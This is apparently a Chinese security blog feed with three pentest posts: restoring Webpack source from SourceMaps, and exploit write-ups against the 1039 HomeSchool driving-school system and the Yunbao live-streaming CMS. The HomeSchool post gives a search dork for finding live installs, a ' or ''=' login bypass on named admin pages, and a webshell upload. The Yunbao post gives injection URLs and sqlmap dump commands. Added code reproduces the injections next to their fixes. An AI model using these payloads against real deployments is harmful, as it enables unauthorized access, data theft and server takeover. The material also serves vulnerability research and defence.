<p>Jekyll feed generated 2021-02-22T22:12:32+08:00 for https://p1kaju.github.io//feed.xml. A-Team@P1Kaju's blog: sharing the new and fun things I occasionally find! 🏄 Author: 朋与厌PopX (P1Kaju@163.com).</p>
<h1 id="restore-source-map">Restoring frontend code from a SourceMap</h1>
<p>Published 2020-11-26T22:00:10+08:00, https://p1kaju.github.io//javascript/restore-source-map</p>
<p>During recent penetration tests I have run into a lot of Webpack-built target sites. Restoring the frontend code lets me find API endpoints, which is how I ended up with unauthorized-access vulnerabilities.</p>
<p><img src="https://secpulseoss.oss-cn-shanghai.aliyuncs.com/wp-content/uploads/1970/01/beepress-image-132042-1590557500.png" alt="img" /></p>
<p>While hunting for endpoints in the JS files referenced from the HTML source, I noticed that the Sources panel of the browser devtools showed the actual frontend Vue code directly.</p>
<p><img src="https://i.loli.net/2020/11/27/6wtcbjfdYCxv2ul.png" alt="image.png" /></p>
<p>After a bit of searching I found a tool, restore-source-tree, that restores the frontend code to local disk straight from the SourceMap.</p>
<h2 id="0x01--安装-restore-source-tree">0x01 Installing restore-source-tree</h2>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>git clone https://github.com/laysent/restore-source-tree.git
<span class="nb">cd </span>restore-source-tree
<span class="c"># installs the published package from the npm registry; the clone above is only needed to read or modify the source</span>
npm i <span class="nt">-g</span> restore-source-tree
</code></pre></div></div>
<h2 id="0x02--还原代码">0x02 Restoring the code</h2>
<p>Open any reachable page, press Ctrl+U to view the source, then open any of its JS files and look for the map reference.</p>
<p><img src="https://secpulseoss.oss-cn-shanghai.aliyuncs.com/wp-content/uploads/1970/01/beepress-image-132042-15905575011.png" alt="img" /></p>
<p>The SourceMap reference we are after is usually in a comment at the very bottom of these files.</p>
<p><img src="https://secpulseoss.oss-cn-shanghai.aliyuncs.com/wp-content/uploads/1970/01/beepress-image-132042-1590557505.png" alt="img" /></p>
<p>Append <em>chunk-vendors.6b92c4bd.js.map</em> to the directory part of the current URL to download the Source Map file. The reference is resolved relative to the URL of the JS file itself, not the page that loaded it, so build the download URL from the script's path.</p>
<h3 id="使用-restore-source-tree-开始还原代码">Restoring the code with restore-source-tree</h3>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>restore-source-tree chunk-vendors.6b92c4bd.js.map
<span class="c"># chunk-vendors.6b92c4bd.js.map is the map file we just downloaded</span>
<span class="c"># -o sets the output directory; it defaults to ./output under the current directory</span>
</code></pre></div></div>
<p><img src="https://secpulseoss.oss-cn-shanghai.aliyuncs.com/wp-content/uploads/1970/01/beepress-image-132042-1590557507.png" alt="img" /></p>
<p>The generated files are placed in the <code class="language-plaintext highlighter-rouge">./output</code> directory.</p>
<p><img src="https://secpulseoss.oss-cn-shanghai.aliyuncs.com/wp-content/uploads/1970/01/beepress-image-132042-1590557508.png" alt="img" /></p>
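<p>The two steps the procedure above relies on, written out as an added example (this is not restore-source-tree's own code): locate the <code class="language-plaintext highlighter-rouge">sourceMappingURL</code> comment at the end of a bundle, resolve it against the bundle's URL, and unpack the <code class="language-plaintext highlighter-rouge">sourcesContent</code> entries of the map into a directory. The bundle text, the map and the <code class="language-plaintext highlighter-rouge">https://target.example</code> URL are constructed for the example. One caveat the tool flow does not make obvious: a map fetched from a target is untrusted input, and its <code class="language-plaintext highlighter-rouge">sources</code> entries can carry <code class="language-plaintext highlighter-rouge">../</code> segments, so the writer below refuses any path that would leave the output directory.</p>

```python
"""Added example (not restore-source-tree's code): find the sourceMappingURL
comment of a built bundle, resolve it against the bundle URL, and write every
source that carries embedded content back to disk. The bundle text, the map
and the target URL below are constructed for this example."""
import json
import os
import re
import tempfile
from urllib.parse import urljoin

# Accepts the "//#", "//@" and "/*#" spellings of the trailing comment.
_MAP_COMMENT = re.compile(r"/[/*][#@]\s*sourceMappingURL=([^\s*]+)")


def find_source_mapping_url(bundle_text):
    """Return the map reference from the bundle, or None; the last comment wins."""
    refs = _MAP_COMMENT.findall(bundle_text)
    return refs[-1] if refs else None


def resolve_map_url(bundle_url, map_ref):
    """Join a relative map name onto the URL the bundle was fetched from."""
    return urljoin(bundle_url, map_ref)


def safe_output_path(root, source):
    """Turn a `sources` entry such as "webpack:///src/api/user.js" into a path
    under root. A map fetched from a target is attacker-controlled input, so
    entries that would escape root are rejected (None)."""
    rel = re.sub(r"^webpack://", "", source).lstrip("/")
    rel = rel.split("?", 1)[0]  # drop the "?abcd" suffixes webpack appends
    target = os.path.realpath(os.path.join(root, rel))
    if not target.startswith(root + os.sep):
        return None
    return target


def restore_source_tree(map_json, out_dir):
    """Write every source that has sourcesContent; report the others."""
    smap = json.loads(map_json)
    if smap.get("version") != 3:
        raise ValueError("unsupported source map version")
    root = os.path.realpath(out_dir)
    written, missing, skipped = [], [], []
    contents = smap.get("sourcesContent") or []
    for i, src in enumerate(smap.get("sources", [])):
        content = contents[i] if i < len(contents) else None
        if content is None:
            missing.append(src)      # referenced by the map but not embedded
            continue
        target = safe_output_path(root, src)
        if target is None:
            skipped.append(src)      # path traversal attempt in the map
            continue
        os.makedirs(os.path.dirname(target), exist_ok=True)
        with open(target, "w", encoding="utf-8") as fh:
            fh.write(content)
        written.append(os.path.relpath(target, root))
    return {"written": written, "missing": missing, "skipped": skipped}


# Constructed stand-ins for chunk-vendors.6b92c4bd.js and its map.
SAMPLE_BUNDLE = "(function(){})();\n//# sourceMappingURL=chunk-vendors.6b92c4bd.js.map\n"
SAMPLE_MAP = json.dumps({
    "version": 3,
    "sources": [
        "webpack:///src/api/user.js",
        "webpack:///src/views/Login.vue?1234",
        "webpack:///node_modules/axios/index.js",
        "webpack:///../../../etc/cron.d/evil",
    ],
    "sourcesContent": [
        "export const getUser = id => axios.get('/api/v1/user/' + id);\n",
        "<template><div/></template>\n",
        None,
        "* * * * * root id\n",
    ],
    "mappings": "AAAA",
})


def demo():
    out_dir = tempfile.mkdtemp(prefix="restored-")
    ref = find_source_mapping_url(SAMPLE_BUNDLE)
    map_url = resolve_map_url("https://target.example/js/chunk-vendors.6b92c4bd.js", ref)
    result = restore_source_tree(SAMPLE_MAP, out_dir)
    return {"out_dir": out_dir, "map_url": map_url, **result}


if __name__ == "__main__":
    print(json.dumps(demo(), indent=2))
```

<p>The <code class="language-plaintext highlighter-rouge">missing</code> list is worth reading on a real target: a map that names <code class="language-plaintext highlighter-rouge">node_modules</code> files without embedding them still tells you which libraries and versions the bundle pulls in, and the <code class="language-plaintext highlighter-rouge">src/api/</code> files that do get written are where the API endpoints live.</p>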
<h2 id="reference">Reference</h2>
<p>https://gh0st.cn/archives/2020-01-08/2</p>
<p>https://laysent.com/til/2019-05-03_restore-source-map</p>
<h1 id="1039-homeschool-security-research">1039 HomeSchool security research</h1>
<p>Published 2019-09-14T21:00:10+08:00, https://p1kaju.github.io//research/1039-HomeSchool-security-research</p>
<p>The 1039 HomeSchool (1039家校通) online lesson-booking system is an all-in-one system for driving schools.</p>
<p>Beijing 1039 Technology Development Co., Ltd. (1039 for short) is the first domestic high-tech company specializing in standardized software development and large application platforms for the training industry, and the best partner for IT construction in that industry.</p>
<p>Google Hack (search dork):</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>intitle: 1039家校通
</code></pre></div></div>
<p><img src="https://i.loli.net/2019/10/26/fDzCsTPXkBGAipO.png" alt="image.png" /></p>
<h2 id="漏洞利用">Exploitation</h2>
<h3 id="sql注入万能密码">SQL injection universal password</h3>
<p>Affected versions: HomeSchool v1.0 - v6.0</p>
<p>Login endpoints</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>/admin/Product/Comstye.aspx
/Student/StudentLogin.aspx
/Teacher/Index.aspx
</code></pre></div></div>
<p><strong>Administrator</strong></p>
<p>Enter <code class="language-plaintext highlighter-rouge">' or ''='</code> (single quotes only) as both the username and the password to log straight in.</p>
<p><img src="https://i.loli.net/2019/09/01/8gQHWsE7Xihzofn.png" alt="1567317867435.png" /></p>
<p>Once logged in, any content on the site can be modified.</p>
<p><img src="https://i.loli.net/2019/09/01/S8bAOypRX9K2TG1.png" alt="1567318261894.png" /></p>
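<p>What the <code class="language-plaintext highlighter-rouge">' or ''='</code> string does to a login query that concatenates user input, as an added example that is not 1039 HomeSchool's code: the page does not show the application's query text, so the <code class="language-plaintext highlighter-rouge">admin</code> table and the string-built query below are assumptions standing in for it. The parameterised query next to it is the fix.</p>

```python
"""Added example (not 1039 HomeSchool code): the `' or ''='` universal password
against a string-built login query, reproduced on an in-memory SQLite table,
next to the parameterised query that defeats it. The admin table, its row and
the query text are constructed assumptions for this example."""
import sqlite3

# The bypass string reported on this page (single quotes only).
UNIVERSAL_PASSWORD = "' or ''='"


def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE admin (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    db.execute("INSERT INTO admin VALUES (1, 'admin', 'S3cret!')")
    return db


def build_vulnerable_sql(username, password):
    """String-built query of the kind such login pages use (this is the bug)."""
    return ("SELECT id FROM admin WHERE username='" + username +
            "' AND password='" + password + "'")


def login_vulnerable(db, username, password):
    """Return the matched admin id, or None when no row matches.
    With the bypass string the WHERE clause becomes
    username='' or ''='' AND password='' or ''=''  and, because AND binds
    tighter than OR, the trailing ''='' makes it true for every row."""
    row = db.execute(build_vulnerable_sql(username, password)).fetchone()
    return row[0] if row else None


def login_fixed(db, username, password):
    """Same check with bound parameters: the input can never become SQL."""
    row = db.execute("SELECT id FROM admin WHERE username=? AND password=?",
                     (username, password)).fetchone()
    return row[0] if row else None


def demo():
    db = make_db()
    return {
        "sql": build_vulnerable_sql(UNIVERSAL_PASSWORD, UNIVERSAL_PASSWORD),
        "vulnerable": login_vulnerable(db, UNIVERSAL_PASSWORD, UNIVERSAL_PASSWORD),
        "fixed": login_fixed(db, UNIVERSAL_PASSWORD, UNIVERSAL_PASSWORD),
        "fixed_real": login_fixed(db, "admin", "S3cret!"),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

<p>The vulnerable call returns the first admin row without knowing any credential; the bound-parameter call returns nothing for the bypass string and still authenticates the real credentials. The same shape applies to the student and teacher login pages listed above.</p>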
<h3 id="教练点评处存在sql注入">SQL injection in the coach review page</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>/Teacher/TeacherPf.aspx?yid=0030
</code></pre></div></div>
<p><img src="https://i.loli.net/2019/09/01/W8MS7TAhqfuHXD1.png" alt="1567322657154.png" /></p>
<p><img src="https://i.loli.net/2019/09/01/ldhsSJpK5X7bziy.png" alt="1567328906324.png" /></p>
<h3 id="管理员后台增加分类处存在sql注入">SQL injection in the admin backend's add-category page</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>/admin/Product/comstye2.aspx
/admin/yk/Index.aspx
</code></pre></div></div>
<p>Use the SQL universal password to enter the backend, then visit:</p>
<p><img src="https://i.loli.net/2019/09/01/oG5yqL6KBlvu42C.png" alt="1567321823408.png" /></p>
<p><img src="https://i.loli.net/2019/09/01/QzeC7uNBLPRF1oh.png" alt="1567321705586.png" /></p>
<h3 id="后台管理编辑器任意文件上传">Arbitrary file upload in the backend editor</h3>
<p>Upload a file</p>
<p><img src="https://i.loli.net/2019/09/01/aXg3nAxYFQ2EIhr.png" alt="1567329246720.png" /></p>
<p>Capturing and replaying the request in Burp shows the path the uploaded file was stored at;</p>
<p><img src="https://i.loli.net/2019/09/01/z9qTfBHeNMShjAI.png" alt="1567329315435.png" /></p>
<p>That path is the address of the uploaded webshell ("大马").
<img src="https://i.loli.net/2019/09/01/YxanmheG8trgodQ.png" alt="image.png" /></p>
<p><strong>WOW GETSHELL!</strong>
<img src="https://i.loli.net/2019/09/01/fbsNvJuHaGD7YwU.png" alt="image.png" /></p>
<h1 id="yunbaocms-security-research">[Code audit] Yunbao Technology live-streaming system</h1>
<p>Published 2019-07-09T09:06:01+08:00, https://p1kaju.github.io//research/yunbaocms-security-research</p>
<p>Sharing two unauthenticated (front-end) SQL injection vulnerabilities in the Yunbao Technology live-streaming system. The <a href="http://www.yunbaokj.com/">Yunbao live system</a> is a secondary development on top of the ThinkCMF framework.</p>
<h2 id="videocontrollerclassphp">VideoController.class.php</h2>
<p>File: /application/Appapi/Controller/VideoController.class.php:17</p>
<p><img src="https://i.loli.net/2021/02/22/d5UWQPF2rMEKvVZ.png" alt="image.png" /></p>
<p>Line 17 passes the videoid parameter straight into the SQL query, which produces an error-based injection.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Vulnerable URL: http://localhost.com/index.php?g=Appapi&m=Video&videoid=1%27
</code></pre></div></div>
<p><img src="https://i.loli.net/2021/02/22/WPoc6Ihz9CfNnay.png" alt="image.png" /></p>
<p>The SQL statement the application executes:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> [ SQL ] : SELECT * FROM `cmf_users_video` WHERE ( id=1' ) LIMIT 1
</code></pre></div></div>
<p>To exploit it with sqlmap, the leading parenthesis has to be closed first, e.g. <code class="language-plaintext highlighter-rouge">1) and 1=1 --+</code> (the URL is quoted in the shell so that the <code class="language-plaintext highlighter-rouge">&amp;</code> characters are not interpreted by it).</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Verification: http://localhost.com/index.php?g=Appapi&m=Video&videoid=1)%20and%201=1%20--+
sqlmap: sqlmap -u "http://localhost.com/index.php?g=Appapi&m=Video&videoid=1*" --prefix "1)"
</code></pre></div></div>
<p><img src="https://i.loli.net/2021/02/22/NTlKUJR5voYILZg.png" alt="image.png" /></p>
<h2 id="playbackcontrollerclassphp">PlaybackController.class.php</h2>
<p>File: /application/Home/Controller/PlaybackController.class.php:14</p>
<p><img src="https://i.loli.net/2021/02/22/FeP4EKdYT39O2nw.png" alt="image.png" /></p>
<p>Line 14 concatenates the incoming touid parameter into the SQL query without any filtering.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Vulnerable URL: http://localhost.com/index.php?g=Home&m=Playback&touid=1%20AND%20GTID_SUBSET(CONCAT(md5(1340914307)),11)
</code></pre></div></div>
<p><img src="https://i.loli.net/2021/02/22/QGdZtV9TnF7pfbI.png" alt="image.png" /></p>
<p>The SQL statement the application executes:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> [ SQL ] : SELECT * FROM `cmf_users_liverecord` WHERE ( uid=1 AND GTID_SUBSET(CONCAT(md5(1340914307)),11) )
</code></pre></div></div>
<p>Dumping data through the vulnerable parameter with sqlmap:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>sqlmap -u "http://localhost.com/index.php?g=Home&m=Playback&touid=1*" --current-user
</code></pre></div></div>
<p><img src="https://i.loli.net/2021/02/22/eulaziMQy31WnDd.png" alt="image.png" /></p>
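<p>The two query shapes quoted above, rebuilt on an in-memory SQLite database as an added example (this is not the Yunbao or ThinkCMF code): it shows why a stray quote produces the error seen on the Video endpoint, why a <code class="language-plaintext highlighter-rouge">1)</code> prefix lets a boolean payload through, and why the Playback endpoint needs no prefix at all. The table layouts and rows are constructed; SQLite stands in for MySQL, so the MySQL-only <code class="language-plaintext highlighter-rouge">GTID_SUBSET</code> error trick is not reproduced, only the boolean form.</p>

```python
"""Added example (not the Yunbao / ThinkCMF code): reproduce the two injection
contexts from this audit against an in-memory SQLite database. The table
layouts and rows are constructed for this example."""
import sqlite3

# The two query shapes the page reports the application building. Both paste
# the request parameter into the SQL text, as the vulnerable controllers do
# (the bug is reproduced deliberately).
VIDEO_QUERY = "SELECT * FROM cmf_users_video WHERE ( id={value} ) LIMIT 1"
PLAYBACK_QUERY = "SELECT * FROM cmf_users_liverecord WHERE ( uid={value} )"


def make_db():
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE cmf_users_video (id INTEGER PRIMARY KEY, uid INTEGER, title TEXT);
        CREATE TABLE cmf_users_liverecord (id INTEGER PRIMARY KEY, uid INTEGER, starttime INTEGER);
        INSERT INTO cmf_users_video VALUES (1, 7, 'first stream'), (2, 7, 'second stream');
        INSERT INTO cmf_users_liverecord VALUES (1, 1, 1560000000), (2, 1, 1560003600), (3, 2, 1560007200);
    """)
    return db


def run_vulnerable(db, template, value):
    """Return ('error', message) or ('rows', count) for an unsanitised value."""
    sql = template.format(value=value)
    try:
        rows = db.execute(sql).fetchall()
    except sqlite3.OperationalError as exc:  # the error-based symptom
        return ("error", str(exc))
    return ("rows", len(rows))


def run_fixed(db, template, value):
    """Cast to int and bind the value as a parameter instead of pasting it in."""
    try:
        n = int(value)
    except ValueError:
        return ("rejected", value)
    rows = db.execute(template.format(value="?"), (n,)).fetchall()
    return ("rows", len(rows))


def probe(db):
    """Exercise the payloads discussed in the audit; returns a dict of results."""
    return {
        # Video endpoint: a stray quote breaks the statement (the error signal)
        "video_quote": run_vulnerable(db, VIDEO_QUERY, "1'")[0],
        # close the "(" first, then append a condition and comment out the rest
        "video_prefix_true": run_vulnerable(db, VIDEO_QUERY, "1) and 1=1 --")[1],
        "video_prefix_false": run_vulnerable(db, VIDEO_QUERY, "1) and 1=2 --")[1],
        # the value is unquoted, so a condition inside the parentheses works too
        "video_inline_false": run_vulnerable(db, VIDEO_QUERY, "1 and 1=2")[1],
        # Playback endpoint: no LIMIT, so a true condition returns all of uid 1
        "playback_true": run_vulnerable(db, PLAYBACK_QUERY, "1 AND 1=1")[1],
        "playback_false": run_vulnerable(db, PLAYBACK_QUERY, "1 AND 1=2")[1],
        # parameter binding: the payload is not a number and is rejected outright
        "fixed_payload": run_fixed(db, PLAYBACK_QUERY, "1 AND 1=1")[0],
        "fixed_valid": run_fixed(db, PLAYBACK_QUERY, "1")[1],
    }


if __name__ == "__main__":
    for key, value in probe(make_db()).items():
        print(f"{key:22} {value}")
```

<p>Because the injected value sits unquoted inside the parentheses, a boolean condition without the closing <code class="language-plaintext highlighter-rouge">1)</code> prefix also works on the Video endpoint; the explicit prefix is what you hand sqlmap when its automatic boundary detection does not find the point by itself. The fixed variant is the PHP-side equivalent of <code class="language-plaintext highlighter-rouge">intval()</code> plus a bound parameter, which is the correct repair for both controllers.</p>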